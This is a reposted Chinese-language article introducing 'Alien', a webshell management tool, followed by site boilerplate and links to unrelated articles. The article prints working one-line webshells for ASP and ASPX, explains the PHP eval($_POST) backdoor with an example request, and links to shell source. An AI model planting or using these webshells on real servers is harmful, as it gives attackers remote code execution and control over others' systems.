介紹一款新的webshell管理工具
項目簡介
語言
功能
File Manager (可顯示圖片, 可SearchFile)
虛擬終端
數據庫
注冊表
監控
截圖
系統信息
項目描述
一句話木馬
一句話木馬是在滲透測試中用來控制服務器的工具
強大之處在于木馬本身體積小,不易發現
以下是最簡單的一句話木馬
PHP
ASP <%execute(request("password"))%>
ASPX <%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>當然, Alien還可以使用asmx, ashx等等的Webshell。
NodeJS和JSP https://github.com/malbuffer4pt/Alien/blob/main/shell.txt
關于JSP webshell目前只有比較原始的菜刀版本, 之后可能會加上蟻劍和冰蝎
shell有進行更改, 新增了可以顯示圖片的功能
關于NodeJS webshell
由于NodeJS特性, 原理跟一般php asp aspx等動態語言的shell不同,
NodeJS目的重在管理而非滲透
伺服器
Windows, Linux, Unix, MacOS
Database管理
MySQL :PHP 交通
原理
以PHP為例子, eval()可以把string以PHP Code去執行,
如果eval()中帶有可控變量,那么就可以執行任意代碼。
如eval($_POST['a']);
HTTP POST a=phpinfo(); 就可以執行phpinfo();
注意!
工具Payloads文件夾內有符合惡意程序的Payload, 可能會被防毒刪除
目前只有刪減版,但部份代碼沒有刪除,Disassemble應該會有奇怪但無法使用的東西
圖片
審核編輯:劉清
聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。
舉報投訴
-
Linux系統
+關注
關注
4文章
593瀏覽量
27403 -
SQL
+關注
關注
1文章
764瀏覽量
44143 -
PHP
+關注
關注
0文章
452瀏覽量
26698 -
伺服器
+關注
關注
1文章
151瀏覽量
19490 -
Shell
+關注
關注
1文章
365瀏覽量
23385
原文標題:一款新的webshell管理工具
文章出處:【微信號:菜鳥學安全,微信公眾號:菜鳥學安全】歡迎添加關注!文章轉載請注明出處。
發布評論請先 登錄
相關推薦
登錄管理工具LimitLogin
LimitLogin是一款于2005年面世的登錄管理工具,由一名微軟合作伙伴技術專家和一名應用程序開發顧問合力開發。LimitLogin旨在在Active Directory域中跟蹤和
發表于 07-16 06:27
介紹一款蘋果操作系統的電源管理工具
Power Manager for Mac是蘋果操作系統上的一款筆記本電源管理工具,該工具支持蘋果系列的筆記本,可以有效地優化蘋果系統,結束不必要的系統任務,同時還可以提高筆記本電池的使用量
發表于 01-03 07:42
飛機駕駛艙(Cockpit)Web圖像化服務器管理工具介紹
1、飛機駕駛艙(Cockpit)Web圖像化服務器管理工具介紹云芯一號是極術社區發布的一款ARM微型服務器板卡,在“云芯一號”試用申請計劃書
發表于 06-17 15:16
基于Web的集群管理工具CWMS
針對目前集群管理工具中沒有實現單一入口或者僅提供命令行交互方式等問題,設計并實現了基于Web的集群管理工具CWMS。分析集群管理系統的體系結構,對集中式體系結構加以改進
發表于 04-15 09:29
?13次下載
目前接口管理工具有哪些_接口管理工具作用是什么
, 找到一款能夠提高對接效率,錄入接口信息的工具是非常有必要的。下面我將推薦幾個文檔管理工具并進行詳細介紹。
發表于 01-04 16:00
?8625次閱讀
Python之包管理工具快速入門
包管理是python這個Get的重要部分。本文介紹了Python的各個包管理工具之間的關系,相信通過這篇文章的介紹,就不會再對distutils、setuptools、distribu
常見MySQL數據庫管理工具的介紹
最初MySQL本身沒有提供非常方便的圖形管理工具,日常的開發和維護均在類似DOS窗口中,用命令行進行數據庫的操作。所以對于開發和測試同學來說,上手略微有點困難,增加了學習成本。
本文詳細給出了幾款常見MySQL數據庫管理工具
如何安裝Python包管理工具
第三方庫,Python提供了一些強大的包管理工具。本文將介紹如何安裝Python包管理工具,以便您能夠在Python項目中方便地管理和使用第
開發幾個簡單功能用來管理webshell
管理工具,填寫密碼選擇生成即可(這里小編推薦使用哥斯拉) ? JMG 工具介紹 jMG (Java Memshell Generator) 是一款支持高度自定義的 Java 內存馬生成
一款任務日程管理工具ToDoList
? 1.軟件介紹 2.軟件功能 3 試用感受 推薦給大家一款開源免費的任務日程管理工具ToDoList,是適合職場人尤其是程序員的經典任務管理軟件,使用好的話會讓大家在工作中事半功倍。
Navicat和DBeaver的完美替代軟件!推薦4款免費數據庫管理工具
navicat替代工具推薦的四款免費數據庫管理工具:NineData、HeidiSQL、DataGrip、phpMyAdmin。無論你是初學者還是專家,無論是輕盈易用還是功能強大,總有一款
cmp項目管理工具的優缺點
CMP項目管理工具,在不同的語境下有不同的含義。一種是指綜合項目管理平臺(Comprehensive Management Platform),它旨在整合和優化項目的各個方面,包括時間管理
工商網監
評論